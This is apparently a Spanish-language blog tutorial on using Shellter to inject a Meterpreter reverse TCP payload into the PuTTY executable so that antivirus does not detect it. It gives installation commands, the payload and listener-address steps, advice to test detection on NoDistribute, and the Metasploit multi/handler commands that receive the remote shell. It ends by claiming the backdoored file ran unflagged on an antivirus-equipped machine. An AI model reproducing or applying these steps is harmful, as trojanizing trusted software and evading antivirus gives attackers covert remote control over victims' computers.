Evadiendo Antivirus con Shellter

Shellter es una herramienta dinámica de inyección de shellcode . Puede ser ustilizado para inyectar código shell en las aplicaciones nativas de Windows (Sólo 32 bits por el momento).
Puedes inyectar tu propio código o uno generado con un Framework, como Metasploit por ejemplo.

Instalación

Lo primero que haremos es descargarlo desde su página oficial (https://www.shellterproject.com/download/) . Es compatible con Windows , Linux y Mac (Usando wine) .
Instalación en kali linux (Si aún no tienes instalado Wine)

Código: Bash
  1. apt-get update
  2. apt-get install shellter

Instalación en backbox

Primero hay que agregar los repositorios :

Código: Bash
  1. nano /etc/apt/sources.list

Añadimos las siguientes entradas :

Código: [Seleccionar]

deb http://ppa.launchpad.net/backbox/four/ubuntu trusty main
deb-src http://ppa.launchpad.net/backbox/four/ubuntu trusty main

Código: Bash
  1. apt-get update
  2. apt-get install shellter

Instalación en Arch Linux :

Código: Bash
  1. yaourt -Syy
  2. yaourt -S aur/shellter

En mi caso , estoy usando LionSec Linux (Basado en backbox) .

Una vez instalado , la siguente fase sería la ejecución .

Para ejecutarlo tecleamos “shellter” en la terminal , o “wine shellter.exe” para los que ya tenien instalado Wine .
Una vez ejecutado , elegimos la opción “Automatique”  (A) .

Después indicamos la ruta del archivo al que queremos inyectar el shellcode . Yo utilisaré putty .

Ahora tenemos que indicar si queremos configurar un payload o elgir uno de la lista que nos propone Shellter. Podemos elegir la opción “L” (Listed) si queremos utilizar uno que ya aparece en la lista , “C” (Configure) para configurarlo manualmente .

Vamos a teclear (L)

Después seleccionamos el payload que vamos a utilizar . Yo elegiré el primero (Meterpreter_Reverse_TCP) .

A continuación indicamos nuestra dirección IP y el puerto de escucha .

Y ya habremos terminado con Shellter .

Bueno ahora vamos a escanear nuestro archivo , en NoDistribute por ejemplo(Recomendado) .
Resultado


:) :)

OK , sólo nos queda configurar el “listener” .

Código: [Seleccionar]

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost x.x.x.x
set lport xxx
exploit

En mi máquina de prueba , dotada de 1 un antivirus , voy a ejecutar mi archivo (putty) . Y como me lo esperaba , no salta ninguna alerta y se ejecuta sin problema .

Anuncios

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s